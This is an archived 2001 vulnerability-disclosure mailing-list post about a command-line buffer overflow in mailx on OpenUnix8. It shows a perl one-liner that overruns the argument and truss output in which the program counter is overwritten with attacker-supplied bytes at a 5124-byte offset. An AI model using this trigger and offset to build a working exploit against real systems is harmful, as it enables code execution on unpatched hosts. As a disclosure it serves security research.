Vulnerability Development mailing list archives
OpenUnix8 mailx command line overflow
From: dotslash () snosoft com
Date: Sun, 21 Oct 2001 12:52:10 -0700
/bin/mail is a symlink to mailx. mailx is not suid however it suffers from a common buffer overflow -KF # truss mail `perl -e 'print "A" x 5122'` execve("/bin/mail", 0x08045F18, 0x08045F24) argc = 2 open("//.mailrc", O_RDONLY, 0666) Err#2 ENOENT Incurred fault #6, FLTBOUNDS %pc = 0x202C4141 siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141 *** process killed ***
# truss mail `perl -e 'print "A" x 5124'` Incurred fault #6, FLTBOUNDS %pc = 0x41414141 siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 *** process killed ***
Current thread:
- OpenUnix8 mailx command line overflow dotslash (Oct 22)